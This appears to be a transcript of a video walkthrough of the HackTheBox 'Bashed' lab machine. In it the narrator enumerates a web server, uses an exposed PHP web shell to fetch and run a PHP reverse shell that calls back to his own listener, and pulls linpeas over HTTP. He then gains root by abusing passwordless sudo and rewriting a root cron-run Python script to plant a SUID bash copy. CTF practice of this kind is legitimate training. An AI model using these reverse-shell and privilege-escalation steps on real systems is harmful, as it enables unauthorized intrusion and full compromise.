Hello everyone, I'm Red Team Beaver, and today I'm bringing you a walkthrough of Bashed by HackTheBox. Bash is an easy rated machine with an interesting foothold methodology, and the privilege escalation part is also very interesting because of how many options we have. I highly encourage you to attempt different ways of gaining an initial foothold as well as privilege escalating, because this box is very nice for practicing beginner as well as advanced techniques. I hope you learned something, and as always, enjoy the video. Alright, so to get started, the first thing I usually do, and as you probably know by now, is I will add the IP address of bashed into my host file. This way I can refer to the alias I will give it instead of the old IP address. You'll see. So let's do sudo nano etc hosts. Next, I will simply paste the IP address, do a tab, and provide it with an alias. So bash.htb is what I choose. Now, as you can see, I can ping bash.htb and it will actually ping the IP address, so I don't need to remember this IP address. So now that's done, let's move on to the Nmap Scan. So for the Nmap Scan, I will do my classic scan, which is nmap-sc for the standard scripts, -sv for version enumeration, sorry, -p- to scan all ports, -on for the normal output that will go into my scans folder and create a file called bashed full. I do -v for verbosity, and finally I will provide the IP address bash.htb. Now to save some time, I've already ran the scan, so let's just look at the results. As you can see, it's quite a limited surface box. We don't have a whole lot to go about. Actually, we only have one port, and it's the port 80 HTTP. We learned that this is an Apache web server, so that may be useful later on. We also have the version. We also see that this is Araxel's development site. So let's go take a look at this. All right, so once we've taken a look at our Nmap results, as we saw, we have a very limited attack surface. And it is super limited because it's only port 80, which is HTTP. So let's take a look at it. So let's go to HTTP bash.htb. Now, if you look at this website, we see actually a quite well designed website. And what I'm doing right now is I'm basically just hovering over every link and looking at the bottom left of my screen, and I just see that it just has an hashtag basically, which just leads me back to this page. So it's not real links that are here, but still I'm clicking to see. So let's click everywhere and see where it leads us. So we see a single.html now that we could have seen elsewhere maybe. Not really. All right, let's go here and take a look at this. So we see a website, well, a URL right here that says /uploads php bash.php. We could go there straight away and try to see if we can see this, which seems to be a web shell. However, let's do the proper enumeration methodology. So let's start busting directories. So let's do go buster there -w to provide a word list that is inside my hopped folder. Then -u to provide a URL. And finally -x to provide an extension, and I will provide it PHP because we are attacking an Apache web server. So what this -x does is basically it will use our word list and append .php at the end of it and see if there's any page that are contained. We could also do .html because we saw that right now we're on a .html page. So there's a couple of interesting its. We see the uploads we saw in this first screenshot right here. So we'll go there first. Then we have PHP that could be interesting. And finally, dev and config are also highly interesting. However, config has a size of 0. So it is an empty file, basically. Let's take a look at uploads first. We see this is empty. And when I say empty is actually just like maybe there's some things like later on that are just hidden. So it's not necessarily empty. It's just that for now we don't see anything. Let's take a look at PHP. Oops, I don't want this. I want the website. I see a sendmail.php, which I believe is a standard script that is like basically inside of the Apache web server. CSS is usually useless for us. Dev, that could be interesting. So let's take a look at dev. Let's provide HTTP again. All right, we see PHP bash, which, if I remember correctly, is actually the same name as in the screenshot we saw. That is inside the upload folder. That should be inside. Yeah, php bash.php, as you can see right here. All right, let's click here. And now we see that there's a working web shell. Who am I? Wow. All right. How can we exploit that? Let's think about that. All right. So there's actually a couple of ways we could think about exploiting this, right? The most obvious one would probably be to attempt to pass a one-line reverse shell payload. So let's take a look at this. So let's do one-liner reverse shell on Google. And I usually use a GitHub one. Yeah, payload all the things. That's a very nice website for anything ref shell related. Let's just grab this, copy it, and modify it right within the web shell itself. So let's take a look at our IP address. We won't need this anymore. Let's do ifconfig or IPA if you're using a newer version. Let's do 443 and let's provide a nc-nvlp 443. This is my listener, and maybe we're gonna get a shell, maybe not. Doesn't seem like it. That would have been too easy. We could attempt to capture traffic and see if we can URL encode this maybe, or like encode it in some ways of form. However, let's be smarter than that. Well, not smarter, but just let's use another direction. So let's rename this to listener 443. Oops. All right, let's go here. We have, so this is an Apache web server. Apache can run PHP files, and we know that on our Kali machine, we have default PHP reverse shells. So let's grab it. So let's do user share web shells PHP, and it's php-reverse shell.php. And let's copy it to our exploit folder. So this is inside your own Kali machine as well. Let's see the exploit and look inside. And as you can see, we have our reverse shell here. Let's edit it. Go down to the IP variable, change it for our own IP. And let's provide the port of 443. Now, there's a couple of ways we could attempt to get this on the web server. The most obvious one would be to download it. So let's do python-m simple HTTP server 80 sudo. There you go. So now basically this is hosting this folder inside a HTTP server that anybody can access. We're using our IP address, of course. So let's go here. Let's do wget HTTP our IP address. Oops. Port 80 / and then the PHP reverse shell file. So we cannot write here, permission denied. No problem. Let's cd to uploads. Try that. Are we inside uploads? Yes, we are. Let's do the exact same commands inside uploads. Maybe we can write there. And yeah, just like that, if we do ls-l, we see that we have our PHP reverse shell that is inside uploads. So normally, if I duplicate this tab and go to uploads that we saw earlier, I should have access to PHP reverse shell.php. And just like that, we have our reverse shell. If I do ID, you see that we are www data. So let's take a look at how we can privilege escalate from there. All right, so the first thing I want to do is look at our different privileges, and one of the first thing we can do is actually run sudo-l. Now, if this did not output anything, and if my basic checks would not have found anything, I would have just uploaded linps to the target machine and run it. However, in this case, we see that we have a script manager, and we can run any command without providing our password. So now all we need to do is basically find a way to switch to script manager and attempt to basically impersonate this person. So how can we do that? Well, we could try to do a very simple command sudo-u script manager and then do /bin/bash to open a bash shell. And just like that, we are script manager. That was quite too easy, if I may say so myself. We could try to find ways to basically make our shell better. Let's go to spawn tty shell and look at cheat sheets. First thing is good, netsec, always great. Let's grab the first one. And basically this should improve our shell. And as you can see, indeed, we now have a much better looking shell, and we can even see our path. That's one way to increase our shell, improve our shell, sorry. So what can this person do? Sudo-l. I need to provide my password, which I do not have for this user, so this isn't the way. So I'll go look at this at the ohm folder. We see that there's rxl and then there's us. So let's switch to us first. -la. Nothing too important is happening here. What about cd rxl? We see that there's user.text, so and we can read it. It's world readable, so we could grab it right here, right now. Good. So there's nothing too obvious happening right now. So what I'll do is I could keep looking manually, but what I like to do is usually grab linps. So let's go back to our home folder. So where I can basically probably write stuff. Yeah. So let's go back to our HTTP server and let's copy linps. So let's grab linps from, I think it's inside my root folder. I can't, let's do sudo. All right, so now I have linps right here that is inside my HTTP web server. Let's wget HTTP 10.10.14.27 port 80 linps.sh. Let's bash linps.sh and let's wait and take a look at the results whenever they're there. By the way, as a side note, for those who do not know, linps is a Linux privilege escalation script that will basically do your enumeration for you, and you can find it on GitHub. If you Google linps, it should be the first link. It's created by Carlos Polup, and this is a very strong privilege escalation script. So just download it, this .sh file, and then you can transfer it however you want. Let's wait again. All right, this is over. So let's take a brief look at what linps found for us. Oh, that's interesting. So we have file that's were modified in the last 5 minutes inside scripts. Now, scripts, this folder is not a standard folder. And we see that test.txt was modified in the last 5 minutes. This is tipping me off that this machine could be a cron job escalation type deal. So probably some kind of script is generating or manipulating this file, and maybe we could manipulate this script that is on a timer. All right, let's not lose any more time and let's go take a look at /script. I'm curious. There's nothing. Interesting. Oh, scripts. I need an S. All right, cd/scripts. So we see there's test.py and then there's test.txt. Let's get out test.py. Well, let's head it in case it's a very massive script. So, fun fact, we see that we own this script, so that's always interesting. And we see that this test.txt file is owned by root. And now, this shouldn't be a long script. Let's do cat. Yeah, that's the full extent of it. So let's focus on this one here, right? So cat is our command. Don't care about that. So F, we open test.txt with the right privileges. We write testing123 exclamation mark, and then we close the file. So if we read this test.txt file, I'm expecting to see testing123 exclamation mark. Let's prove our point. And now we see that right here, it outputted testing123 exclamation mark. We have control over this, and this is owned by root, which means that root is running this script on a timer, basically. So let's modify the script, right? And create a script that root will run and that will give us a reverse shell or make us be higher privileges. Let's do that. All right, so one way we could actually get a reverse shell is by creating a new Python script, right? So let's do exploit.py and let's do import OS. So this import OS will allow us to run commands. And the command I want right now is quite simple. I want to do os.system. This is what basically creates my command. And I want to do as root copy bin bash into /tmp/root bash. Then I want to do chmod plus s /tmp/root bash. Now this may be a bit more advanced than some other techniques, but basically what this does is it will create a file called tmp root bash. So it will copy the bash binary into root bash, and then I will put the suid bit on the root bash. Suid basically lets you run a binary as its owner, and in this case, the owner is root. So I will be able to run a bash as root. So this line should be enough. So what I can do now is go here. As you can see, I clear my terminal a little bit. I can remove test.py, and I can doubly get the new one. 10, 10, 14, 27. Let's get exploit.py. Now you can see we have exploit.py. Let's rename it to exploit.py. Let's rename it to test.py. And now we wait. And hopefully inside the TMP file, the TMP folder, we should see a root bash appear at some point. All right, after a little bit, as you can see, I now have a root bash file that exists. That's awesome. Now I can do /root bash, and then I do -p. And just like that, you can see that I am root. And if I do id, I have the effective UID of root. So just like that, I am root and I fully compromise the system. All right, so A quick note about what happened right there. I chose the root bash method of privilege escalation because I like to keep privilege escalation on the machine itself. Now, if you prefer to get a reverse shell, of course you can do that. You basically have control over a Python file that is being run by root. So you have full control over the machine virtually. And there's an infinite amount of ways that you can privilege escalate. For example, you can use a reverse shell, you can use a root bash, you can overwrite the etc shadow file, you can overwrite the etc passability file, you can do anything you want. You have control over a Python script that is being run by root. So yeah, feel free to attempt different ways, such as if you did the root bash way, try to do a reverse shell. If you did the reverse shell, try to do root bash way. Now, either way you do it, congratulations, you rooted this machine. Thank you so much for watching this walkthrough of Bash by HackTheBox. As I mentioned during the intro of this video, I highly encourage you to attempt different ways of gaining an initial foothold as well as privilege escalating, because this box is a very nice opportunity to test all of these techniques. If you enjoyed the video, please leave it a like and subscribe to my channel to not miss anything. If I provide you value, consider supporting my work via the links in the description below. Any support helps. See you next week for another video. This is Red Team Beaver logging off.